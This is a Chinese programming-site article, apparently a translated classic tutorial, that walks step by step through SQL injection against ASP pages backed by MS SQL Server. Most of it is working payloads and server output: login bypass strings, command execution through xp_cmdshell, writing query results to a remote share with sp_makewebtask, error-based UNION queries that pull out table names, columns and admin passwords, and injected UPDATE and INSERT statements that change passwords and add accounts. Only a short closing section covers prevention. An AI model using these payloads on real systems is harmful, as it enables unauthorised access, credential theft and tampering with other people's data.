欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

SQL注入测试实例分析

程序员文章站 2022-03-19 12:08:37
SQL注入测试实例分析这篇文章主要为大家介绍了SQL注入测试实例分析,对于数据库安全非常重要,需要的朋友可以参考下... 14-08-06...

本文详细讲述了 sql注入的原理及防范技巧,目的是让初学者利用sql注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己。希望能对大家有所帮助。

一、 介绍

  当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并且你知道管理员经常为机器打补丁, 我们就不得不使用web攻击方式了. sql注入是web攻击的一种类型 ,这种方式只需要开放80端口就够了并且即使管理员打了全部的补丁也能工作. 它攻击的目标是web程序(像asp,jsp,php,cgi等)本身而不是web服务器或系统上运行的服务.

  本文不介绍任何新的东西, sql注入已经被广泛的讨论和使用. 我们写这篇文章目的是因为我们想要使用sql注入进行一些演练测试,希望这个能对各位有用. 你可以在这里找到一两个窍门但是请你关注下"9.0 哪里有更多的信息?" 可以得到关于sql注入更多,更深入的技术.

  1.什么是sql注入:

  通过网页的输入项来注入sql查询或命令是一种技巧。许多网页会从用户那里获取参数,并构建sql查询来访问数据库。以用户登录为例,页面收集用户名和密码然后构建sql去查询数据库,来校验用户名和密码的有效性。通过sql注入,我们可以发送经过精心编造的用户名和/或密码字段,来改变sql查询语句并赋予 我们其它一些权限。

  2.你需要什么:

  任意web浏览器。

二、 你应该寻找什么

  尝试寻找那些允许你提交数据的页面,即: 登录页面,查询页面,反馈信息等等。有时,html页面会用post命令来把参数发送到另外一个asp页面上去。那么,你可能在url中看不到参数。不过,你可以查看页面的html源代码,查找"form"标签。你会在一些html源代码中看到类似下面的东东:

  

复制代码
代码如下:
<form action=search/search.asp method=post></p> <p>  <input type=hidden name=a value=c></p> <p>  </form>

  位于<form>和</form>之间的所有内容都可能暗含着有用的参数(利用你的智慧)。

  2.1 如果你找不到任何带有输入框的页面怎么办?

  你应该寻找诸如asp, jsp, cgi, 或 php这样的页面。尤其要找那些携带有参数的 url,比如:

  

复制代码
代码如下:
http://xxx/index.asp?id=10

三、如何测试它是否是易受攻击的

1.从一个单引号技巧开始。输入类似这样的内容:

  

复制代码
代码如下:
hi' or 1=1--

  到登录页面中,或者密码中,甚至直接在url中。例如:

  

复制代码
代码如下:
- login: hi' or 1=1-- </p> <p>  - pass: hi' or 1=1--</p> <p>  - http://xxx/index.asp?id=hi' or 1=1--

  假如你必须在一个hidden字段中来这样做,就把html源代码下载下来,保存到硬盘上,修改url和相应的 hidden字段。例如:

  

复制代码
代码如下:
<form action=http://xxx/search/search.asp method=post></p> <p>  <input type=hidden name=a value="hi' or 1=1--"></p> <p>  </form>

  如果够幸运,不需要任何用户名和密码你就可以登录。

2.为什么是 ' or 1=1--

  让我们通过另外一个例子来展示' or 1=1-- 的重要性。除了能绕过“登录”验证,它还能展示一些在正常情况下很难看到的额外信息。假设,有一个asp页面,其功能是将我们导航到下面的url:

  

复制代码
代码如下:
http://xxx/index.asp?category=food

  在url中,'category'是变量名;food是赋给变量的值。为了完成导航功能,我们猜想asp页面应该包含下面的代码(这些代码是我们为了完成此测试而编写的真实代码):

  

复制代码
代码如下:
v_cat = request("category") </p> <p>  sqlstr="select * from product where pcategory='" & v_cat & "'" </p> <p>  set rs=conn.execute(sqlstr)

  如上所示,变量v_cat获取了参数category的值,sql语句将变成:

  

复制代码
代码如下:
select * from product where pcategory='food'

  该sql语句将返回符合where条件的的结果集。在本例中,where条件是pcategory='food' 。

  下面,假设我们将url改成下面的形式:

  

复制代码
代码如下:
http://xxx/index.asp?category=food' or 1=1--

  现在,变量v_cat等于"food' or 1=1-- "。将变量v_cat在sql中进行替换,我们将得到下面语句:

  

复制代码
代码如下:
select * from product where pcategory='food' or 1=1--'

  该语句将得到product表中所有记录,无论pcategory是否等于'food'。“--”告诉ms sql server忽略其后面的所有内容(笔者注:其实可以理解为注释,“--”后面所有的内容都为注释),方便我们处理单引号。在某些情况下,"--"可以被替换成”#“。

  如果后台的数据库不是sql server,查询语句的单引号就不能被忽略。在这种情况下,我们可以尝试下面的查询条件:

  

复制代码
代码如下:
' or 'a'='a

  此时,sql语句将变成:

  

复制代码
代码如下:
select * from product where pcategory='food' or 'a'='a'

  根据真实的sql语句,我们还可以尝试以下各种变形:

  

复制代码
代码如下:
' or 1=1-- </p> <p>  " or 1=1-- </p> <p>  or 1=1-- </p> <p>  ' or 'a'='a </p> <p>  " or "a"="a </p> <p>  ') or ('a'='a

四、如何通过sql注入来进行远程执行

  能够注入sql命名通常意味着我们可以随意执行任何sql查询。默认安装的ms sql 服务是作为system来运行的, 它相当于 windows系统中的administrator。我们可以利用存储过程,比如master..xp_cmdshell 来进行远程执行:

  

复制代码
代码如下:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--

  如果单引号(')不管用,可以试试双引号 (")。

  分号会终止当前的sql查询,这就允许你开始一个新的sql命名。要验证命令是否执行成功,你需要监听来自10.10.1.2的 icmp数据包,检查是否收到来自服务器的数据包:

  

复制代码
代码如下:
#tcpdump icmp

  如果你没有收到任何来自服务器的ping请求,并且收到了暗示许可错误的信息,则有可能是管理员限制了web用户对存储过程的访问。

五、如何获取sql查询的输出

  可以通过使用sp_makewebtask把你的查询写入到html:

  

复制代码
代码如下:
'; exec master..sp_makewebtask "\\10.10.1.3\share\output.html", "select * from information_schema.tables"

  注意这个目标ip的文件夹"share"的共享权限是everyone.

六、如何从数据库的odbc错误消息中获取数据

  我们几乎可以在ms sql服务器产生的错误消息中得到任何我们想要的数据. 通过类似下面的这个地址:

  

复制代码
代码如下:
http://xxx/index.asp?id=10

  我们将试图把这个整数'10'和另外的字符串进行union联合操作:

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 table_name from information_schema.tables--

  系统表 information_schema.tables 包含了服务器上所有表的信息. 这个table_name 字段包含数据库中每个表的字段. 这样就不存在无此表无此字段的问题了. 看我们的查询语句:

  

复制代码
代码如下:
select top 1 table_name from information_schema.tables-

  这个语句将会返回数据库中第一个表的名字. 当我们使用这个字符串值和一个数字'10'进行union操作, ms sql 服务器将会试图转换这个字符串(nvarchar)为一个数字. 这会产生一个错误, 因为我们不能把nvarchar类型转换成数字. 服务器将会产生以下错误信息:

  

复制代码
代码如下:
microsoft ole db provider for odbc drivers error '80040e07'</p> <p>  [microsoft][odbc sql server driver][sql server]syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

  这个错误消息清楚的告诉我们这个值不能转换为数字. 同时呢,里面也包含了数据库中第一个表的名字 ,就是"table1".

  想获取下一个表的名字,我们使用下面的语句:

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 table_name from information_schema.tables where table_name not in ('table1')--

  我们也可以使用like关键词来搜索数据:

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 table_name from information_schema.tables where table_name like '%25login%25'--

  输出:

  

复制代码
代码如下:
microsoft ole db provider for odbc drivers error '80040e07'</p> <p>  [microsoft][odbc sql server driver][sql server]syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

  这个匹配, '%25login%25' 的结果和 %login% 是一样的在sql server服务器中.这样,我们将得到 匹配的第一个表的名字, "admin_login".

1.如何挖掘到表所有列的名称

  我们可以使用另一个非常有用的表information_schema.columns 来标出某一个的表所有列名:

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 column_name from information_schema.columns where table_name='admin_login'--

  输出:

  

复制代码
代码如下:
microsoft ole db provider for odbc drivers error '80040e07'</p> <p>  [microsoft][odbc sql server driver][sql server]syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

  注意错误提示,里面已经包含了第一个列名, 下面我们使用not in ()来取得下一个列的名称:

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 column_name from information_schema.columns where table_name='admin_login' where column_name not in ('login_id')--

  输出:

  

复制代码
代码如下:
microsoft ole db provider for odbc drivers error '80040e07'</p> <p>  [microsoft][odbc sql server driver][sql server]syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

  按上面的步骤继续下一个,我们就能获得剩下的所有列的名称, 即"password", "details"等列. 当我们得到下面的这个错误提示时,就表示我们已经找出所有的列名了.

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 column_name from information_schema.columns where table_name='admin_login' where column_name not in ('login_id','login_name','password',details')--

  输出:

  

复制代码
代码如下:
microsoft ole db provider for odbc drivers error '80040e14'</p> <p>  [microsoft][odbc sql server driver][sql server]order by items must appear in the select list if the statement contains a union operator.</p> <p>  /index.asp, line 5

2.如何检索到我们想要的数据

  现在我们已经确认了一些重要的表,以及它们的列名,我们可以用同样的技巧从数据库中挖掘任何我们想要的信息.

  现在,让我们从这个"admin_login"表中得到第一个login_name的值吧:

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 login_name from admin_login--

  输出:

  

复制代码
代码如下:
microsoft ole db provider for odbc drivers error '80040e07'</p> <p>  [microsoft][odbc sql server driver][sql server]syntax error converting the nvarchar value 'neo' to a column of data type int.</p> <p>  /index.asp, line 5

  根据上面的错误提示我们知道这里有一个管理员的登录名是"neo".下面,我们从数据库中到"neo"的密码:

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 password from admin_login where login_name='neo'--</p> <p>  output:</p> <p>  microsoft ole db provider for odbc drivers error '80040e07'</p> <p>  [microsoft][odbc sql server driver][sql server]syntax error converting the nvarchar value 'm4trix' to a column of data type int.</p> <p>  /index.asp, line 5

  密码就在错误提示里了,现在让我们用"neo"和密码"m4trix"登录试试吧.

3.如何获取数字型字符串的值

  上面所述的技术具有局限性。在我们试图转换包含有效数字(即只是0-9之间的字符)的时候,我们没有得到任何错误信息。让我们试着获取"trinity"的密码"31173":

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 password from admin_login where login_name='trinity'

  我们可能得到"此页面不存在“的错误。原因在于:在于整数(这时是10)联接之前,密码"31173"将转换为一个数字。由于这是一个有效地联接(union)语句,因此sql server不会抛出odbc错误信息,因此我们将不能获取到任何数字型的项。

  为了解决这个问题,我们给数字型字符串后面提交一些字母,这样可以确保转换失效。让我们看看下面这个查询:

  

复制代码
代码如下:
http://xxx/index.asp?id=10 union select top 1 convert(int, password%2b'%20morpheus') from admin_login where login_name='trinity'

  我们只是给我们需要的密码文本后添加了加号(+)。(“+”的ascii编码是0x2b)。我们将给真正的密码后添加“(空格)休眠符“。因此,即使我们有一个字符型字符串”31173“,它最终将变为”31173休眠符“。通过手工调用convert()函数试图把“31173休眠符“转换为整数时,sql server抛出odbc错误信息:

  

复制代码
代码如下:
microsoft ole db provider for odbc drivers error '80040e07'</p> <p>  [microsoft][odbc sql server driver][sql server]syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.</p> <p>  /index.asp, line 5

  现在,你就可以使用密码为"31173"的"trinity"用户登陆了。

七、如何向数据库中更新或插入数据

  当我们成功的获取到一张表的所有字段名后,我们就有可能update甚至insert一条新记录到该表中。例如,修改"neo"的密码:

  

复制代码
代码如下:
http://xxx/index.asp?id=10; update 'admin_login' set 'password' = 'newpas5' where login_name='neo'--

  下面insert一条新记录到数据库中:

  

复制代码
代码如下:
http://xxx/index.asp?id=10; insert into 'admin_login' ('login_id', 'login_name', 'password', 'details') values (666,'neo2','newpas5','na')--

  现在我们可以用用户名"neo2"和密码"newpas5"来登录了。

八、如何避免sql注入

  过滤参数中的单引号、双引号、斜杠、反斜杠、分号等字符;以及null、回车符、换行符等扩展字符。这些参数可能来自于:

前台表单(form)中的用户输入
url中的参数
cookie
  对于数字,在将其传入sql语句之前将其从字符串(string)转换成数字(number);或者用isnumeric函数确定其确实是数字。

  将sql server的运行用户修改为低权限用户(low privilege user)。

  删除不再需要的存储过程,例如:master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

相关标签: sql 注入 分析